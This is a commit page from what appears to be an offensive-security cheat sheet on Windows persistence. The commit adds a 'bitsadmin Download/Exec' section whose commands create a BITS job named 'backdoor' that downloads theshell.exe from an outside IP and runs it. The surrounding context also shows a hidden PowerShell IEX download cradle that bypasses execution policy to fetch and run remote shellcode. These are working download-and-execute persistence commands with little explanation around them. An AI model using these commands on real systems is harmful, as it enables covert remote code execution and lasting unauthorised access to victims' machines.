Skip to content

Commit 2217c13

Browse files
committed
Add in BITSADMIN Download/Exec Technique
1 parent 4247001 commit 2217c13

File tree

1 file changed

+19
-0
lines changed

1 file changed

+19
-0
lines changed

persistence/windows/general.md

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -37,6 +37,25 @@ Taken from http://synjunkie.blogspot.de/2008/03/basic-dos-foo.html
3737
* **Command with arguments**: `powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))"`
3838
* **Description**: According to [posted slides](http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607), _"Schedule this and it will execute the shellcode on that page, pulling it each time (so you can change as needed)"_.
3939

40+
### bitsadmin Download/Exec
41+
Make the backdoor:
42+
```
43+
bitsadmin /create backdoor
44+
bitsadmin /addfile backdoor http://192.168.20.10/theshell.exe C:\windows\temp\theshell.exe
45+
bitsadmin /SETMINRETRYDELAY 88000
46+
bitsadmin /SETNOTIFYCMDLINE backdoor C:\windows\temp\theshell.exe NULL
47+
```
48+
49+
Check the backdoor is set up correctly:
50+
```
51+
bitsadmin /getnotifycmdline backdoor
52+
bitsadmin /listfiles backdoor
53+
```
54+
55+
Run the backdoor:
56+
```
57+
bitsadmin /RESUME backdoor
58+
```
4059

4160
### Remote Assistance Enable
4261
* **Command with arguments**: `reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f`

0 commit comments

Comments
 (0)